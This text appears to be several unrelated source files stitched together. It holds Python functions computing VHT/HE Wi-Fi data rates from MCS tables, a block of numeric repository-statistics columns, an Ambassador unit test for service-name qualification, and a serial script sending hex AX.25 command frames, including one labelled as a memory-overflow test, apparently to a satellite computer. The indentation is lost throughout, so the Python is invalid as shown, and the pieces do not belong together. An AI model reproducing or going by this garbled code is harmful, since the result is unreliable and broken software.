def calculated_data_rate_rx_VHT(self):
print("calculated_data_rate_rx_VHT")
N_sd = 0 # Number of Data Subcarriers based on modulation and bandwith
N_bpscs = 0 # Number of coded bits per Subcarrier(Determined by the modulation, MCS)
R = 0 # coding , (Determined by the modulation, MCS )
N_ss = 0 # Number of Spatial Streams
T_dft = 3.2 * 10 ** -6 # Constant for HT
T_gi_short = .4 * 10 ** -6 # Guard index.
T_gi_long = .8 * 10 ** -6 # Guard index.
# Note the T_gi is not exactly know so need to calculate bothh with .4 and .8
# the nubmer of Data Subcarriers is based on modulation and bandwith
bw = int(self.rx_mhz)
print("Mhz {Mhz}".format(Mhz=self.rx_mhz))
if bw == 20:
N_sd = 52
elif bw == 40:
N_sd = 108
elif bw == 80:
N_sd = 234
elif bw == 160:
N_sd = 468
else:
print("For HT if cannot be read bw is assumed to be 20")
N_sd = 52
self.rx_mhz = 20
# NSS
N_ss = self.rx_nss
# MCS (Modulation Coding Scheme) determines the constands
# MCS 0 == Modulation BPSK R = 1/2 , N_bpscs = 1,
# Only for HT configuration
if self.rx_mcs == 0:
R = 1 / 2
N_bpscs = 1
# MCS 1 == Modulation QPSK R = 1/2 , N_bpscs = 2
elif self.rx_mcs == 1:
R = 1 / 2
N_bpscs = 2
# MCS 2 == Modulation QPSK R = 3/4 , N_bpscs = 2
elif self.rx_mcs == 2:
R = 3 / 4
N_bpscs = 2
# MCS 3 == Modulation 16-QAM R = 1/2 , N_bpscs = 4
elif self.rx_mcs == 3:
R = 1 / 2
N_bpscs = 4
# MCS 4 == Modulation 16-QAM R = 3/4 , N_bpscs = 4
elif self.rx_mcs == 4:
R = 3 / 4
N_bpscs = 4
# MCS 5 == Modulation 64-QAM R = 2/3 , N_bpscs = 6
elif self.rx_mcs == 5:
R = 2 / 3
N_bpscs = 6
# MCS 6 == Modulation 64-QAM R = 3/4 , N_bpscs = 6
elif self.rx_mcs == 6:
R = 3 / 4
N_bpscs = 6
# MCS 7 == Modulation 64-QAM R = 5/6 , N_bpscs = 6
elif self.rx_mcs == 7:
R = 5 / 6
N_bpscs = 6
# MCS 8 == Modulation 256-QAM R = 3/4 , N_bpscs = 8
elif self.rx_mcs == 8:
R = 3 / 4
N_bpscs = 8
# MCS 9 == Modulation 256-QAM R = 5/6 , N_bpscs = 8
elif self.rx_mcs == 9:
R = 5 / 6
N_bpscs = 8
print(
"mcs {mcs} N_sd {N_sd} N_bpscs {N_bpscs} R {R} N_ss {N_ss} T_dft {T_dft} T_gi_short {T_gi_short}".format(
mcs=self.rx_mcs, N_sd=N_sd, N_bpscs=N_bpscs, R=R, N_ss=N_ss, T_dft=T_dft, T_gi_short=T_gi_short))
self.rx_data_rate_gi_short_Mbps = ((N_sd * N_bpscs * R * float(N_ss)) / (T_dft + T_gi_short)) / 1000000
print("rx_data_rate gi_short {data_rate} Mbit/s".format(data_rate=self.rx_data_rate_gi_short_Mbps))
print(
"mcs {mcs} N_sd {N_sd} N_bpscs {N_bpscs} R {R} N_ss {N_ss} T_dft {T_dft} T_gi_long {T_gi_long}".format(
mcs=self.rx_mcs, N_sd=N_sd, N_bpscs=N_bpscs, R=R, N_ss=N_ss, T_dft=T_dft, T_gi_long=T_gi_long))
self.rx_data_rate_gi_long_Mbps = ((N_sd * N_bpscs * R * float(N_ss)) / (T_dft + T_gi_long)) / 1000000
print("rx_data_rate gi_long {data_rate} Mbps".format(data_rate=self.rx_data_rate_gi_long_Mbps))
if abs(self.rx_mbit - self.rx_data_rate_gi_short_Mbps) <= abs(
self.rx_mbit - self.rx_data_rate_gi_long_Mbps):
self.rx_mbit_calc = self.rx_data_rate_gi_short_Mbps
self.rx_gi = T_gi_short
else:
self.rx_mbit_calc = self.rx_data_rate_gi_long_Mbps
self.rx_gi = T_gi_long
##########################################
#
# HE no OFDMA - changes the calculations
#
###########################################
def calculated_data_rate_tx_HE(self):
print("calculated_data_rate_tx_HE")
# TODO compare with standard for 40 MHz if values change
N_sd = 0 # Number of Data Subcarriers based on modulation and bandwith
N_bpscs = 0 # Number of coded bits per Subcarrier(Determined by the modulation, MCS)
R = 0 # coding , (Determined by the modulation, MCS )
N_ss = 0 # Number of Spatial Streams
T_dft = 3.2 * 10 ** -6 # Constant for HT
T_gi_short = .4 * 10 ** -6 # Guard index.
T_gi_long = .8 * 10 ** -6 # Guard index.
bw = 20
# Note the T_gi is not exactly know so need to calculate bothh with .4 and .8
# the nubmer of Data Subcarriers is based on modulation and bandwith
bw = int(self.tx_mhz)
print("Mhz {Mhz}".format(Mhz=self.tx_mhz))
if bw == 20:
N_sd = 52
elif bw == 40:
N_sd = 108
elif bw == 80:
N_sd = 234
elif bw == 160:
N_sd = 468
else:
print("For HT if cannot be read bw is assumed to be 20")
N_sd = 52
self.tx_mhz = 20
# NSS
N_ss = self.tx_nss
# MCS (Modulation Coding Scheme) determines the constands
# MCS 0 == Modulation BPSK R = 1/2 , N_bpscs = 1,
# Only for HT configuration
if self.tx_mcs == 0:
R = 1 / 2
N_bpscs = 1
# MCS 1 == Modulation QPSK R = 1/2 , N_bpscs = 2
elif self.tx_mcs == 1:
R = 1 / 2
N_bpscs = 2
# MCS 2 == Modulation QPSK R = 3/4 , N_bpscs = 2
elif self.tx_mcs == 2:
R = 3 / 4
N_bpscs = 2
# MCS 3 == Modulation 16-QAM R = 1/2 , N_bpscs = 4
elif self.tx_mcs == 3:
R = 1 / 2
N_bpscs = 4
# MCS 4 == Modulation 16-QAM R = 3/4 , N_bpscs = 4
elif self.tx_mcs == 4:
R = 3 / 4
N_bpscs = 4
# MCS 5 == Modulation 64-QAM R = 2/3 , N_bpscs = 6
elif self.tx_mcs == 5:
R = 2 / 3
N_bpscs = 6
# MCS 6 == Modulation 64-QAM R = 3/4 , N_bpscs = 6
elif self.tx_mcs == 6:
R = 3 / 4
N_bpscs = 6
# MCS 7 == Modulation 64-QAM R = 5/6 , N_bpscs = 6
elif self.tx_mcs == 7:
R = 5 / 6
N_bpscs = 6
# MCS 8 == Modulation 256-QAM R = 3/4 , N_bpscs = 8
elif self.tx_mcs == 8:
R = 3 / 4
N_bpscs = 8
# MCS 9 == Modulation 256-QAM R = 5/6 , N_bpscs = 8
elif self.tx_mcs == 9:
R = 5 / 6
N_bpscs = 8
print(
"tx: mcs {mcs} N_sd {N_sd} N_bpscs {N_bpscs} R {R} N_ss {N_ss} T_dft {T_dft} T_gi_short {T_gi_short}".format(
mcs=self.tx_mcs, N_sd=N_sd, N_bpscs=N_bpscs, R=R, N_ss=N_ss, T_dft=T_dft, T_gi_short=T_gi_short))
self.tx_data_rate_gi_short_Mbps = ((N_sd * N_bpscs * R * float(N_ss)) / (T_dft + T_gi_short)) / 1000000
print("tx_data_rate gi_short {data_rate} Mbit/s".format(data_rate=self.tx_data_rate_gi_short_Mbps))
print(
"tx: mcs {mcs} N_sd {N_sd} N_bpscs {N_bpscs} R {R} N_ss {N_ss} T_dft {T_dft} T_gi_long {T_gi_long}".format(
mcs=self.tx_mcs, N_sd=N_sd, N_bpscs=N_bpscs, R=R, N_ss=N_ss, T_dft=T_dft, T_gi_long=T_gi_long))
self.tx_data_rate_gi_long_Mbps = ((N_sd * N_bpscs * R * float(N_ss)) / (T_dft + T_gi_long)) / 1000000
print("data_rate gi_long {data_rate} Mbps".format(data_rate=self.tx_data_rate_gi_long_Mbps))
if abs(self.tx_mbit - self.tx_data_rate_gi_short_Mbps) <= abs(self.tx_mbit - self.tx_data_rate_gi_long_Mbps):
self.tx_mbit_calc = self.tx_data_rate_gi_short_Mbps
self.tx_gi = T_gi_short
else:
self.tx_mbit_calc = self.tx_data_rate_gi_long_Mbps
self.tx_gi = T_gi_long
def calculated_data_rate_rx_HE(self):
print("calculated_data_rate_rx_HE")
N_sd = 0 # Number of Data Subcarriers based on modulation and bandwith
N_bpscs = 0 # Number of coded bits per Subcarrier(Determined by the modulation, MCS)
R = 0 # coding , (Determined by the modulation, MCS )
N_ss = 0 # Number of Spatial Streams
T_dft = 3.2 * 10 ** -6 # Constant for HT
T_gi_short = .4 * 10 ** -6 # Guard index.
T_gi_long = .8 * 10 ** -6 # Guard index.
# Note the T_gi is not exactly know so need to calculate bothh with .4 and .8
# the nubmer of Data Subcarriers is based on modulation and bandwith
bw = int(self.rx_mhz)
print("Mhz {Mhz}".format(Mhz=self.rx_mhz))
if bw == 20:
N_sd = 52
elif bw == 40:
N_sd = 108
elif bw == 80:
N_sd = 234
elif bw == 160:
N_sd = 468
else:
print("For HT if cannot be read bw is assumed to be 20")
N_sd = 52
self.rx_mhz = 20
# NSS
N_ss = self.rx_nss
# MCS (Modulation Coding Scheme) determines the constands
# MCS 0 == Modulation BPSK R = 1/2 , N_bpscs = 1,
# Only for HT configuration
if self.rx_mcs == 0:
R = 1 / 2
N_bpscs = 1
# MCS 1 == Modulation QPSK R = 1/2 , N_bpscs = 2
elif self.rx_mcs == 1:
R = 1 / 2
N_bpscs = 2
# MCS 2 == Modulation QPSK R = 3/4 , N_bpscs = 2
elif self.rx_mcs == 2:
R = 3 / 4
N_bpscs = 2
# MCS 3 == Modulation 16-QAM R = 1/2 , N_bpscs = 4
elif self.rx_mcs == 3:
R = 1 / 2
N_bpscs = 4
# MCS 4 == Modulation 16-QAM R = 3/4 , N_bpscs = 4
elif self.rx_mcs == 4:
R = 3 / 4
N_bpscs = 4
# MCS 5 == Modulation 64-QAM R = 2/3 , N_bpscs = 6
elif self.rx_mcs == 5:
R = 2 / 3
N_bpscs = 6
# MCS 6 == Modulation 64-QAM R = 3/4 , N_bpscs = 6
elif self.rx_mcs == 6:
R = 3 / 4
N_bpscs = 6
# MCS 7 == Modulation 64-QAM R = 5/6 , N_bpscs = 6
elif self.rx_mcs == 7:
R = 5 / 6
N_bpscs = 6
# MCS 8 == Modulation 256-QAM R = 3/4 , N_bpscs = 8
elif self.rx_mcs == 8:
R = 3 / 4
N_bpscs = 8
# MCS 9 == Modulation 256-QAM R = 5/6 , N_bpscs = 8
elif self.rx_mcs == 9:
R = 5 / 6
N_bpscs = 8
print(
"mcs {mcs} N_sd {N_sd} N_bpscs {N_bpscs} R {R} N_ss {N_ss} T_dft {T_dft} T_gi_short {T_gi_short}".format(
mcs=self.rx_mcs, N_sd=N_sd, N_bpscs=N_bpscs, R=R, N_ss=N_ss, T_dft=T_dft, T_gi_short=T_gi_short))
self.rx_data_rate_gi_short_Mbps = ((N_sd * N_bpscs * R * float(N_ss)) / (T_dft + T_gi_short)) / 1000000
print("rx_data_rate gi_short {data_rate} Mbit/s".format(data_rate=self.rx_data_rate_gi_short_Mbps))
print(
"mcs {mcs} N_sd {N_sd} N_bpscs {N_bpscs} R {R} N_ss {N_ss} T_dft {T_dft} T_gi_long {T_gi_long}".format(
mcs=self.rx_mcs, N_sd=N_sd, N_bpscs=N_bpscs, R=R, N_ss=N_ss, T_dft=T_dft, T_gi_long=T_gi_long))
self.rx_data_rate_gi_long_Mbps = ((N_sd * N_bpscs * R * float(N_ss)) / (T_dft + T_gi_long)) / 1000000
print("rx_data_rate gi_long {data_rate} Mbps".format(data_rate=self.rx_data_rate_gi_long_Mbps))
if abs(self.rx_mbit - self.rx_data_rate_gi_short_Mbps) <= abs(
self.rx_mbit - self.rx_data_rate_gi_long_Mbps):
self.rx_mbit_calc = self.rx_data_rate_gi_short_Mbps
self.rx_gi = T_gi_short
else:
self.rx_mbit_calc = self.rx_data_rate_gi_long_Mbps
self.rx_gi = T_gi_long
| 43.911017
| 122
| 0.545917
| 5,084
| 31,089
| 3.079268
| 0.04465
| 0.068221
| 0.037943
| 0.011242
| 0.832003
| 0.807921
| 0.781667
| 0.758416
| 0.747237
| 0.740083
| 0
| 0.052575
| 0.339863
| 31,089
| 708
| 123
| 43.911017
| 0.710228
| 0.199331
| 0
| 0.716338
| 0
| 0.021544
| 0.114148
| 0.007502
| 0
| 0
| 0
| 0.001412
| 0
| 1
| 0.023339
| false
| 0
| 0.010772
| 0.008977
| 0.044883
| 0.109515
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
37c9c2e2e3a1a12a6f156c740b9fb2fb400552d9
| 9,165
|
py
|
Python
|
python/tests/test_qualify_service.py
|
imranismail/ambassador
|
0468c4f1daf2aeb254a5af3217d2d7f3ebf4cb90
|
[
"Apache-2.0"
] | null | null | null |
python/tests/test_qualify_service.py
|
imranismail/ambassador
|
0468c4f1daf2aeb254a5af3217d2d7f3ebf4cb90
|
[
"Apache-2.0"
] | null | null | null |
python/tests/test_qualify_service.py
|
imranismail/ambassador
|
0468c4f1daf2aeb254a5af3217d2d7f3ebf4cb90
|
[
"Apache-2.0"
] | null | null | null |
from typing import Optional
import logging
import sys
import pytest
logging.basicConfig(
level=logging.INFO,
format="%(asctime)s test %(levelname)s: %(message)s",
datefmt='%Y-%m-%d %H:%M:%S'
)
logger = logging.getLogger("ambassador")
from ambassador import Config, IR
from ambassador.fetch import ResourceFetcher
from ambassador.utils import NullSecretHandler
from ambassador.ir import IRResource
from ambassador.ir.irbasemapping import qualify_service_name
yaml = '''
---
apiVersion: getambassador.io/v1
kind: Module
name: ambassador
config: {}
'''
def test_qualify_service():
aconf = Config()
fetcher = ResourceFetcher(logger, aconf)
fetcher.parse_yaml(yaml)
aconf.load_all(fetcher.sorted())
secret_handler = NullSecretHandler(logger, None, None, "0")
ir = IR(aconf, file_checker=lambda path: True, secret_handler=secret_handler)
assert ir, "could not create an IR"
assert qualify_service_name(ir, "backoffice", None) == "backoffice"
assert qualify_service_name(ir, "backoffice", "default") == "backoffice"
assert qualify_service_name(ir, "backoffice", "otherns") == "backoffice.otherns"
assert qualify_service_name(ir, "backoffice.otherns", None) == "backoffice.otherns"
assert qualify_service_name(ir, "backoffice.otherns", "default") == "backoffice.otherns"
assert qualify_service_name(ir, "backoffice.otherns", "otherns") == "backoffice.otherns"
assert qualify_service_name(ir, "backoffice:80", None) == "backoffice:80"
assert qualify_service_name(ir, "backoffice:80", "default") == "backoffice:80"
assert qualify_service_name(ir, "backoffice:80", "otherns") == "backoffice.otherns:80"
assert qualify_service_name(ir, "backoffice.otherns:80", None) == "backoffice.otherns:80"
assert qualify_service_name(ir, "backoffice.otherns:80", "default") == "backoffice.otherns:80"
assert qualify_service_name(ir, "backoffice.otherns:80", "otherns") == "backoffice.otherns:80"
assert qualify_service_name(ir, "http://backoffice", None) == "http://backoffice"
assert qualify_service_name(ir, "http://backoffice", "default") == "http://backoffice"
assert qualify_service_name(ir, "http://backoffice", "otherns") == "http://backoffice.otherns"
assert qualify_service_name(ir, "http://backoffice.otherns", None) == "http://backoffice.otherns"
assert qualify_service_name(ir, "http://backoffice.otherns", "default") == "http://backoffice.otherns"
assert qualify_service_name(ir, "http://backoffice.otherns", "otherns") == "http://backoffice.otherns"
assert qualify_service_name(ir, "http://backoffice:80", None) == "http://backoffice:80"
assert qualify_service_name(ir, "http://backoffice:80", "default") == "http://backoffice:80"
assert qualify_service_name(ir, "http://backoffice:80", "otherns") == "http://backoffice.otherns:80"
assert qualify_service_name(ir, "http://backoffice.otherns:80", None) == "http://backoffice.otherns:80"
assert qualify_service_name(ir, "http://backoffice.otherns:80", "default") == "http://backoffice.otherns:80"
assert qualify_service_name(ir, "http://backoffice.otherns:80", "otherns") == "http://backoffice.otherns:80"
assert qualify_service_name(ir, "https://backoffice", None) == "https://backoffice"
assert qualify_service_name(ir, "https://backoffice", "default") == "https://backoffice"
assert qualify_service_name(ir, "https://backoffice", "otherns") == "https://backoffice.otherns"
assert qualify_service_name(ir, "https://backoffice.otherns", None) == "https://backoffice.otherns"
assert qualify_service_name(ir, "https://backoffice.otherns", "default") == "https://backoffice.otherns"
assert qualify_service_name(ir, "https://backoffice.otherns", "otherns") == "https://backoffice.otherns"
assert qualify_service_name(ir, "https://backoffice:443", None) == "https://backoffice:443"
assert qualify_service_name(ir, "https://backoffice:443", "default") == "https://backoffice:443"
assert qualify_service_name(ir, "https://backoffice:443", "otherns") == "https://backoffice.otherns:443"
assert qualify_service_name(ir, "https://backoffice.otherns:443", None) == "https://backoffice.otherns:443"
assert qualify_service_name(ir, "https://backoffice.otherns:443", "default") == "https://backoffice.otherns:443"
assert qualify_service_name(ir, "https://backoffice.otherns:443", "otherns") == "https://backoffice.otherns:443"
assert qualify_service_name(ir, "localhost", None) == "localhost"
assert qualify_service_name(ir, "localhost", "default") == "localhost"
assert qualify_service_name(ir, "localhost", "otherns") == "localhost"
# It's not meaningful to actually say "localhost.otherns", but it should passed through unchanged.
assert qualify_service_name(ir, "localhost.otherns", None) == "localhost.otherns"
assert qualify_service_name(ir, "localhost.otherns", "default") == "localhost.otherns"
assert qualify_service_name(ir, "localhost.otherns", "otherns") == "localhost.otherns"
assert qualify_service_name(ir, "localhost:80", None) == "localhost:80"
assert qualify_service_name(ir, "localhost:80", "default") == "localhost:80"
assert qualify_service_name(ir, "localhost:80", "otherns") == "localhost:80"
# It's not meaningful to actually say "localhost.otherns", but it should passed through unchanged.
assert qualify_service_name(ir, "localhost.otherns:80", None) == "localhost.otherns:80"
assert qualify_service_name(ir, "localhost.otherns:80", "default") == "localhost.otherns:80"
assert qualify_service_name(ir, "localhost.otherns:80", "otherns") == "localhost.otherns:80"
assert qualify_service_name(ir, "http://localhost", None) == "http://localhost"
assert qualify_service_name(ir, "http://localhost", "default") == "http://localhost"
assert qualify_service_name(ir, "http://localhost", "otherns") == "http://localhost"
# It's not meaningful to actually say "localhost.otherns", but it should passed through unchanged.
assert qualify_service_name(ir, "http://localhost.otherns", None) == "http://localhost.otherns"
assert qualify_service_name(ir, "http://localhost.otherns", "default") == "http://localhost.otherns"
assert qualify_service_name(ir, "http://localhost.otherns", "otherns") == "http://localhost.otherns"
assert qualify_service_name(ir, "http://localhost:80", None) == "http://localhost:80"
assert qualify_service_name(ir, "http://localhost:80", "default") == "http://localhost:80"
assert qualify_service_name(ir, "http://localhost:80", "otherns") == "http://localhost:80"
# It's not meaningful to actually say "localhost.otherns", but it should passed through unchanged.
assert qualify_service_name(ir, "http://localhost.otherns:80", None) == "http://localhost.otherns:80"
assert qualify_service_name(ir, "http://localhost.otherns:80", "default") == "http://localhost.otherns:80"
assert qualify_service_name(ir, "http://localhost.otherns:80", "otherns") == "http://localhost.otherns:80"
assert qualify_service_name(ir, "https://localhost", None) == "https://localhost"
assert qualify_service_name(ir, "https://localhost", "default") == "https://localhost"
assert qualify_service_name(ir, "https://localhost", "otherns") == "https://localhost"
# It's not meaningful to actually say "localhost.otherns", but it should passed through unchanged.
assert qualify_service_name(ir, "https://localhost.otherns", None) == "https://localhost.otherns"
assert qualify_service_name(ir, "https://localhost.otherns", "default") == "https://localhost.otherns"
assert qualify_service_name(ir, "https://localhost.otherns", "otherns") == "https://localhost.otherns"
assert qualify_service_name(ir, "https://localhost:443", None) == "https://localhost:443"
assert qualify_service_name(ir, "https://localhost:443", "default") == "https://localhost:443"
assert qualify_service_name(ir, "https://localhost:443", "otherns") == "https://localhost:443"
# It's not meaningful to actually say "localhost.otherns", but it should passed through unchanged.
assert qualify_service_name(ir, "https://localhost.otherns:443", None) == "https://localhost.otherns:443"
assert qualify_service_name(ir, "https://localhost.otherns:443", "default") == "https://localhost.otherns:443"
assert qualify_service_name(ir, "https://localhost.otherns:443", "otherns") == "https://localhost.otherns:443"
assert qualify_service_name(ir, "https://bad-service:443:443", "otherns") == "https://bad-service:443:443"
assert qualify_service_name(ir, "https://bad-service:443:443", "otherns", rkey="test-rkey") == "https://bad-service:443:443"
errors = ir.aconf.errors
assert "-global-" in errors
errors = errors["-global-"]
assert len(errors) == 2
assert not errors[0]["ok"]
assert errors[0]["error"] == "Malformed service port in https://bad-service:443:443"
assert not errors[1]["ok"]
assert errors[1]["error"] == "test-rkey: Malformed service port in https://bad-service:443:443"
if __name__ == '__main__':
pytest.main(sys.argv)
| 59.129032
| 128
| 0.714675
| 1,124
| 9,165
| 5.679715
| 0.085409
| 0.166667
| 0.211466
| 0.278195
| 0.809994
| 0.806704
| 0.795896
| 0.763001
| 0.749373
| 0.572682
| 0
| 0.026137
| 0.119149
| 9,165
| 154
| 129
| 59.512987
| 0.764648
| 0.063393
| 0
| 0
| 0
| 0
| 0.436633
| 0.017139
| 0
| 0
| 0
| 0
| 0.710526
| 1
| 0.008772
| false
| 0
| 0.078947
| 0
| 0.087719
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
807178bb7026602f6624f84f7ba97bc0e7407339
| 5,817
|
py
|
Python
|
comms_computer/utils/ax25_test.py
|
peguerosdc/odiseo-fsw
|
17b14332b2e35b3ea0bb9c3e84b8c3b949f67591
|
[
"MIT"
] | null | null | null |
comms_computer/utils/ax25_test.py
|
peguerosdc/odiseo-fsw
|
17b14332b2e35b3ea0bb9c3e84b8c3b949f67591
|
[
"MIT"
] | null | null | null |
comms_computer/utils/ax25_test.py
|
peguerosdc/odiseo-fsw
|
17b14332b2e35b3ea0bb9c3e84b8c3b949f67591
|
[
"MIT"
] | 1
|
2021-05-20T06:59:06.000Z
|
2021-05-20T06:59:06.000Z
|
import serial
ser = serial.Serial('COM3', 9600)
print "Sending test frame..."
# FRAME TO REQUEST SendTelemetry
# ser.write("\x7e\x7e\x7e\x7e\x06\xc7\xf4\xe8\x01\x02\x21\x93\x0f\x5c\xbc\x1d\x81\x6e\x9c\x1a\x39\xbd\x6c\x15\x90\xca\xb0\xb9\xd9\x13\xac\x46\x70\x64\x7f\x43\x4e\x6e\x93\xbc\x12\xd2\x81\x61\xcf\x0f\x53\x1a\x39\xbd\x6c\x15\x90\xca\xbf\xea\x39\xbd\x6c\x15\x90\xca\xbf\xea\x39\xbd\x6c\x15\x90\xca\x45\x7d\x44\x82\x6c\x1a\x39\xbd\x6c\x1a\x39\xbd\x6c\x1a\x39\xbd\x6c\x1a\x39\xbd\x6c\x1a\x39\xbd\x6c\x1a\x39\xb2\x3f\x0f\xa9\x77\xd3\xf0\xf5\xcb\x34\xe6\x1c\xf0\xf5\xcb\xce\x8b\xf6\x48\xa7\x21\x83\xe7\x19\x40\x4c\x1d\x7e\x7e")
# FRAME TO WRITE IN MEMORY
#ser.write("\x7e\x7e\x7e\x7e\x06\xc7\xf4\xe8\x01\x02\x21\x93\x0f\x5c\xbc\x1d\x81\x6e\x9c\x1a\x39\xbd\x6c\x15\x90\xca\xb0\xb9\xd9\x13\xac\x46\x70\x64\x7f\x43\x4e\x6e\x93\xbc\x12\xd2\x81\x61\xcf\x0f\x53\x1a\x39\xbd\x6c\x15\x90\xca\xbf\xea\x39\xbd\x6c\x15\x90\xca\xbf\xea\x39\xbd\x6c\x15\x90\xca\x45\x7d\x44\x82\x6c\x1a\x39\xbd\x6c\x1a\x39\xbd\x6c\x1a\x39\xbd\x6c\x1a\x39\xbd\x6c\x1a\x39\xbd\x6c\x1a\x39\xb2\x3f\x0f\xa9\x77\xd3\xf0\xf5\xcb\x34\xe6\xe6\x67\x7d\xc5\x97\x7d\xca\xcb\x34\xe6\xe9\x3b\x34\xe6\xe9\x3b\x34\xe6\xe9\x3b\x34\xe6\xe9\x3b\x34\xe6\xe9\x3b\xc1\xd8\xe3\xd8\x98\x5a\xf4\x4f\x64\x7f\x4c\x1d\x7e\x7e")
# FRAME TO OVERFLOW MEMORY
# ser.write("\x7e\x7e\x7e\x7e\x06\xc7\xf4\xe8\x01\x02\x21\x93\x0f\x5c\xbc\x1d\x81\x6e\x9c\x1a\x39\xbd\x6c\x15\x90\xca\xb0\xb9\xd9\x13\xac\x46\x70\x64\x7f\x43\x4e\x6e\x93\xbc\x12\xd2\x81\x61\xcf\x0f\x53\x1a\x39\xbd\x6c\x15\x90\xca\xbf\xea\x39\xbd\x6c\x15\x90\xca\xbf\xea\x39\xbd\x6c\x15\x90\xca\x45\x7d\x44\x82\x6c\x1a\x39\xbd\x6c\x1a\x39\xbd\x6c\x1a\x39\xbd\x6c\x1a\x39\xbd\x6c\x1a\x39\xbd\x6c\x1a\x39\xb2\x3f\x0f\xa9\x77\xd3\xf0\xf5\xcb\x34\xe6\xe6\x67\x7d\xc5\x97\x7d\xca\xcb\x34\xe6\xe9\x3b\x34\xe6\xe9\x3b\x34\xe6\xe9\x3b\x34\xe6\xe9\x3b\x34\xe6\xe9\x3b\x34\xe6\xe9\x3b\x34\xe6\xe9\x3b\x34\xe6\xe9\x3b\x34\xe6\xe9\x3b\x34\xe6\xe9\x3b\x34\xe6\xe9\x3b\x34\xe6\xe9\x3b\x34\xe6\xe9\x3b\x34\xe6\xe9\x3b\xc1\xd8\xec\x84\x24\x48\x26\xce\x05\xb0\x4c\x1d\x7e\x7e")
# FRAME TO REQUEST MEMORY
# ser.write("\x7e\x7e\x7e\x7e\x06\xc7\xf4\xe8\x01\x02\x21\x93\x0f\x5c\xbc\x1d\x81\x6e\x9c\x1a\x39\xbd\x6c\x15\x90\xca\xb0\xb9\xd9\x13\xac\x46\x70\x64\x7f\x43\x4e\x6e\x93\xbc\x12\xd2\x81\x61\xcf\x0f\x53\x1a\x39\xbd\x6c\x15\x90\xca\xbf\xea\x39\xbd\x6c\x15\x90\xca\xbf\xea\x39\xbd\x6c\x15\x90\xca\x45\x7d\x44\x82\x6c\x1a\x39\xbd\x6c\x1a\x39\xbd\x6c\x1a\x39\xbd\x6c\x1a\x39\xbd\x6c\x1a\x39\xbd\x6c\x1a\x39\xb2\x3f\x0f\xa9\x77\xd3\xf0\xf5\xcb\x34\xe6\x13\xa3\xef\x07\x4d\x18\x3e\x84\x50\x96\xf9\x60\xca\xb0\x4c\x1d\x7e\x7e")
# FRAME TO REQUEST LOGS
# ser.write("\x7e\x7e\x7e\x7e\x06\xc7\xf4\xe8\x01\x02\x21\x93\x0f\x5c\xbc\x1d\x81\x6e\x9c\x1a\x39\xbd\x6c\x15\x90\xca\xb0\xb9\xd9\x13\xac\x46\x70\x64\x7f\x43\x4e\x6e\x93\xbc\x12\xd2\x81\x61\xcf\x0f\x53\x1a\x39\xbd\x6c\x15\x90\xca\xbf\xea\x39\xbd\x6c\x15\x90\xca\xbf\xea\x39\xbd\x6c\x15\x90\xca\x45\x7d\x44\x82\x6c\x1a\x39\xbd\x6c\x1a\x39\xbd\x6c\x1a\x39\xbd\x6c\x1a\x39\xbd\x6c\x1a\x39\xbd\x6c\x1a\x39\xb2\x3f\x0f\xa9\x77\xd3\xf0\xf5\xcb\x34\xe6\x13\x59\x8d\xb1\x49\xa2\x91\xc0\x53\x1a\x39\xb2\x30\x5c\xbc\x1d\x7e\x7e")
# FRAME TO CLEAR LOGS
# ser.write("\x7e\x7e\x7e\x7e\x06\xc7\xf4\xe8\x01\x02\x21\x93\x0f\x5c\xbc\x1d\x81\x6e\x9c\x1a\x39\xbd\x6c\x15\x90\xca\xb0\xb9\xd9\x13\xac\x46\x70\x64\x7f\x43\x4e\x6e\x93\xbc\x12\xd2\x81\x61\xcf\x0f\x53\x1a\x39\xbd\x6c\x15\x90\xca\xbf\xea\x39\xbd\x6c\x15\x90\xca\xbf\xea\x39\xbd\x6c\x15\x90\xca\x45\x7d\x44\x82\x6c\x1a\x39\xbd\x6c\x1a\x39\xbd\x6c\x1a\x39\xbd\x6c\x1a\x39\xbd\x6c\x1a\x39\xbd\x6c\x1a\x39\xb2\x3f\x0f\xa9\x77\xd3\xf0\xf5\xcb\x34\xe6\xe6\x92\xb6\xf1\x8b\x03\x79\x0b\x13\x2d\xa6\xa5\x26\x40\x4c\x1d\x7e\x7e")
# FRAME TO CLEAN MEMORY
# ser.write("\x7e\x7e\x7e\x7e\x06\xc7\xf4\xe8\x01\x02\x21\x93\x0f\x5c\xbc\x1d\x81\x6e\x9c\x1a\x39\xbd\x6c\x15\x90\xca\xb0\xb9\xd9\x13\xac\x46\x70\x64\x7f\x43\x4e\x6e\x93\xbc\x12\xd2\x81\x61\xcf\x0f\x53\x1a\x39\xbd\x6c\x15\x90\xca\xbf\xea\x39\xbd\x6c\x15\x90\xca\xbf\xea\x39\xbd\x6c\x15\x90\xca\x45\x7d\x44\x82\x6c\x1a\x39\xbd\x6c\x1a\x39\xbd\x6c\x1a\x39\xbd\x6c\x1a\x39\xbd\x6c\x1a\x39\xbd\x6c\x1a\x39\xb2\x3f\x0f\xa9\x77\xd3\xf0\xf5\xcb\x34\xe6\xe6\x9d\xea\x42\xc5\x62\x43\xc0\x28\x6d\x9e\x9c\xef\xf2\x73\x1d\x7e\x7e")
# FRAME TO CHANGE BEACON FREQUENCY to 250 ms
# WARNING
